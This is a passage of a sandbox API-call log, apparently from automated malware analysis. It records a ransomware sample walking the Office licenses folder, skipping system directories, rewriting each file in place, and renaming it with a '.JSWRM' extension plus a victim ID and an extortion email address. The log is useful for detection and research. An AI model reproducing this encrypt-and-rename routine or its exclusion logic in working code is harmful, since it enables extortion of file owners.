0x235c80 [0104.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.414] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11175) returned 1 [0104.414] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.414] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.511] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.511] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.513] CloseHandle (hObject=0x45c) returned 1 [0104.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0104.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0104.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0104.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.515] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0104.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0104.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.519] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5505c31, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5505c31, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe55eaa21, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x57c1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTest-ppd.xrm-ms", cAlternateFileName="O365BU~2.XRM")) returned 1 [0104.519] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0104.519] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0104.519] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0104.519] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0104.520] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.520] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.520] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.521] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.521] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.521] lstrcmpiW (lpString1="O365BusinessR_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0104.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0104.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.527] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22465) returned 1 [0104.528] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x57c0) returned 0x24c1d0 [0104.528] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x57c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x57c0, lpOverlapped=0x0) returned 1 [0104.537] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.538] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x57c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x57c0, lpOverlapped=0x0) returned 1 [0104.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.538] CloseHandle (hObject=0x45c) returned 1 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0104.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0104.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0104.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.541] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe54934e0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe54934e0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5578312, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTest-ul-oob.xrm-ms", cAlternateFileName="O365BU~1.XRM")) returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.542] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.543] lstrcmpiW (lpString1="O365BusinessR_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0104.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0104.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.546] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11626) returned 1 [0104.546] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.546] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.556] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.557] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.557] CloseHandle (hObject=0x45c) returned 1 [0104.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0104.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0104.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0104.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0104.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0104.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.617] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe58731f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe58731f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe595804a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTrial-pl.xrm-ms", cAlternateFileName="O37A5D~1.XRM")) returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.617] lstrcmpiW (lpString1="O365BusinessR_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0104.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0104.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | 